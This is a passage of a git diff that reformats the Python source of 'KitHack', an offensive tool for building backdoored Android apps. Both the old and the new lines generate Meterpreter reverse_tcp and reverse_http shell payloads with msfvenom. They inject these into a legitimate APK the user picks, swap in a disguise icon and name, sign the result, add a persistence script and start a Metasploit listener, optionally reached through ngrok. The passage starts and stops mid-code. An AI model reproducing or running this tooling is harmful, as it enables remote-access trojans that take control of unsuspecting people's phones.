APK...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') + "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" + ) time.sleep(4) os.system( - 'zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) + "zipalign 4 output/kithack.apk output/{0}.apk".format( + mainout + ) + ) while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating persistence file...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - ext = mainout + '.apk' + ext = mainout + ".apk" subprocess.Popen( - ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] + ) print( - "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + "{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout + ) + ) break print( - "\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Deleting temporary files...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) os.system( - 'rm -rf output/payload output/payload.apk output/kithack.apk') + "rm -rf output/payload output/payload.apk output/kithack.apk" + ) print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"' + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "\n{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) os.system( - 'rm -rf output/payload output/payload.apk output/kithack.apk') + "rm -rf output/payload output/payload.apk output/kithack.apk" + ) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() # Salida de bucle - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p android/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > output/{2}.apk'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p android/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > output/{2}.apk".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: + if os.stat("output/{}.apk".format(mainout)).st_size != 0: while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating persistence file...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - ext = mainout + '.apk' + ext = mainout + ".apk" subprocess.Popen( - ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] + ) print( - "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + "{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout + ) + ) break print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"') - pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"' + ) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "\n{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif a == '02': + elif a == "02": + print("{0}\n [*] {1}Select Method:\n".format(DEFAULT, GREEN)) print( - '{0}\n [*] {1}Select Method:\n'.format(DEFAULT, GREEN)) - print('{0}[01]{1} Use the old Metasploit method'.format( - WHITE, YELLOW)) - print('{0}[02]{1} Use the new KitHack method'.format( - WHITE, YELLOW)) + "{0}[01]{1} Use the old Metasploit method".format(WHITE, YELLOW) + ) + print("{0}[02]{1} Use the new KitHack method".format(WHITE, YELLOW)) m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) m = m.zfill(2) - if m == '01': + if m == "01": run_network() - LHOST = input( - "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input( - "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) Tk().withdraw() APK = filedialog.askopenfilename( - title="KITHACK - SELECT APK ORIGINAL", filetypes=(("apk files", "*.apk"), ("all files", "*.*"))) + title="KITHACK - SELECT APK ORIGINAL", + filetypes=(("apk files", "*.apk"), ("all files", "*.*")), + ) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) + ) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ) print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT) + ) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -x {0} -p android/meterpreter/reverse_tcp LHOST={1} LPORT={2} > output/{3}.apk'.format(APK, LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -x {0} -p android/meterpreter/reverse_tcp LHOST={1} LPORT={2} > output/{3}.apk".format( + APK, LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: + if os.stat("output/{}.apk".format(mainout)).st_size != 0: while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating persistence file...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - ext = mainout + '.apk' + ext = mainout + ".apk" subprocess.Popen( - ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] + ) print( - "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + "{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout + ) + ) break print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"' + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "\n{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif m == '02': + elif m == "02": run_network() - LHOST = input( - "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input( - "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) Tk().withdraw() APK = filedialog.askopenfilename( - title="KITHACK - SELECT APK ORIGINAL", filetypes=(("apk files", "*.apk"), ("all files", "*.*"))) + title="KITHACK - SELECT APK ORIGINAL", + filetypes=(("apk files", "*.apk"), ("all files", "*.*")), + ) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) + ) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ) print( - "\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT) + ) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p android/meterpreter/reverse_tcp LPORT={0} LHOST={1} R > output/payload.apk'.format(LPORT, LHOST)) + "systemctl start postgresql && msfvenom -p android/meterpreter/reverse_tcp LPORT={0} LHOST={1} R > output/payload.apk".format( + LPORT, LHOST + ) + ) location = os.getcwd() print( - "{0}[*] Decompiling original APK...{1}".format(GREEN, DEFAULT)) + "{0}[*] Decompiling original APK...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) os.system( - 'cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk'.format(APK, location)) + "cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk".format( + APK, location + ) + ) print( - "\n{0}[*] Decompiling payload APK...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Decompiling payload APK...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - os.system( - 'apktool d -f -o output/payload output/payload.apk') + os.system("apktool d -f -o output/payload output/payload.apk") print( - "\n{0}[*] Configuring RAT Payload...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Configuring RAT Payload...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; rat']) - print( - "\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + subprocess.Popen(["bash", "-c", ". lib/apkf.sh; rat"]) + print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) time.sleep(4) - os.system( - 'apktool b output/original -o output/kithack.apk') - if os.path.isfile('output/kithack.apk'): - print( - "\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + os.system("apktool b output/original -o output/kithack.apk") + if os.path.isfile("output/kithack.apk"): + print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') + "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" + ) time.sleep(4) os.system( - 'zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) + "zipalign 4 output/kithack.apk output/{0}.apk".format( + mainout + ) + ) while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating persistence file...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - ext = mainout + '.apk' + ext = mainout + ".apk" subprocess.Popen( - ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] + ) print( - "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + "{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout + ) + ) break print( - "\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Deleting temporary files...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) os.system( - 'rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') + "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" + ) print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"' + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "\n{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) os.system( - 'rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') + "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" + ) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print("{}\n[X] INVALID OPTION\n".format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') + os.system("clear") main() else: print("\n{}[X] INVALID OPTION\n".format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') + os.system("clear") main() - elif pay == '05': - print('{0}\n [*] {1}Select APK Type:\n'.format(DEFAULT, GREEN)) - print('{0}[01]{1} APK MSF'.format(WHITE, YELLOW)) - print('{0}[02]{1} APK ORIGINAL'.format(WHITE, YELLOW)) + elif pay == "05": + print("{0}\n [*] {1}Select APK Type:\n".format(DEFAULT, GREEN)) + print("{0}[01]{1} APK MSF".format(WHITE, YELLOW)) + print("{0}[02]{1} APK ORIGINAL".format(WHITE, YELLOW)) a = input("{0}KitHack >> {1}".format(RED, DEFAULT)) a = a.zfill(2) - if a == '01': + if a == "01": run_network() - LHOST = input( - "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input( - "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - while input("\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + while ( + input( + "\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): break else: Tk().withdraw() icon = filedialog.askopenfilename( - title="KITHACK - SELECT ICON PNG", filetypes=(("png files", "*.png"), ("all files", "*.*"))) + title="KITHACK - SELECT ICON PNG", + filetypes=(("png files", "*.png"), ("all files", "*.*")), + ) print("\n{0}ICON: {1}".format(YELLOW, icon)) OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) + ) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ) file = open("/tmp/data.txt", "w") - file.write(icon + '\n') + file.write(icon + "\n") file.write(mainout) file.close() print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT) + ) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p android/shell/reverse_http LHOST={0} LPORT={1} R > output/payload.apk'.format(LHOST, LPORT)) - print( - "{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) + "systemctl start postgresql && msfvenom -p android/shell/reverse_http LHOST={0} LPORT={1} R > output/payload.apk".format( + LHOST, LPORT + ) + ) + print("{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) time.sleep(4) - os.system( - 'apktool d -f -o output/payload output/payload.apk') + os.system("apktool d -f -o output/payload output/payload.apk") print( - "\n{0}[*] Configuring icon change...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Configuring icon change...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; icon']) - print( - "\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + subprocess.Popen(["bash", "-c", ". lib/apkf.sh; icon"]) + print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) time.sleep(4) - os.system( - 'apktool b output/payload -o output/kithack.apk') + os.system("apktool b output/payload -o output/kithack.apk") location = os.getcwd() - if os.path.isfile('output/kithack.apk'): - print( - "\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + if os.path.isfile("output/kithack.apk"): + print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') + "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" + ) time.sleep(4) os.system( - 'zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) + "zipalign 4 output/kithack.apk output/{0}.apk".format( + mainout + ) + ) while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating persistence file...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - ext = mainout + '.apk' + ext = mainout + ".apk" subprocess.Popen( - ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] + ) print( - "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + "{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout + ) + ) break print( - "\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Deleting temporary files...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) os.system( - 'rm -rf output/payload output/payload.apk output/kithack.apk') + "rm -rf output/payload output/payload.apk output/kithack.apk" + ) print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_http; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_http; exploit\'"'.format( + LHOST, LPORT + ) + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_http; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_http; exploit\'"' + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "\n{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) os.system( - 'rm -rf output/payload output/payload.apk output/kithack.apk') + "rm -rf output/payload output/payload.apk output/kithack.apk" + ) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() # Salida de bucle - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p android/shell/reverse_http LHOST={0} LPORT={1} R > output/{2}.apk'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p android/shell/reverse_http LHOST={0} LPORT={1} R > output/{2}.apk".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: + if os.stat("output/{}.apk".format(mainout)).st_size != 0: while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating persistence file...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - ext = mainout + '.apk' + ext = mainout + ".apk" subprocess.Popen( - ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] + ) print( - "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + "{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout + ) + ) break print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: 